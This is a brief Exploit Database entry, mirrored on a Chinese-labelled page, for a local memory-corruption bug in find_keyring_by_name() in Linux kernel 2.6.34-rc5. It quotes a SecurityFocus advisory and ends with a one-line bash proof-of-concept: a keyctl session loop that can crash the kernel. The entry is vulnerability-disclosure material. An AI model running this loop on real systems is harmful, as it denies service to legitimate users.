Linux Kernel 2.6.34 – ‘find_keyring_by_name()’ Local Memory Corruption

• Exploit Database
• 25 阅读

• 作者： Toshiyuki Okajima
  日期： 2010-04-27
• 类别：

  • dos
  平台：

  • linux
• 来源：https://www.exploit-db.com/exploits/33886/

• source: https://www.securityfocus.com/bid/39719/info
  
  The Linux kernel is prone to a local memory-corruption vulnerability.
  
  Attackers can exploit this issue to crash the affected computer, denying service to legitimate users. Given the nature of this issue, attackers may also be able to run arbitrary code, but this has not been confirmed.
  
  kernel 2.6.34-rc5 is vulnerable.
  
  The following proof-of-concept is available:
  
  for ((i=0; i<100000; i++)); do keyctl session wibble /bin/true || break; done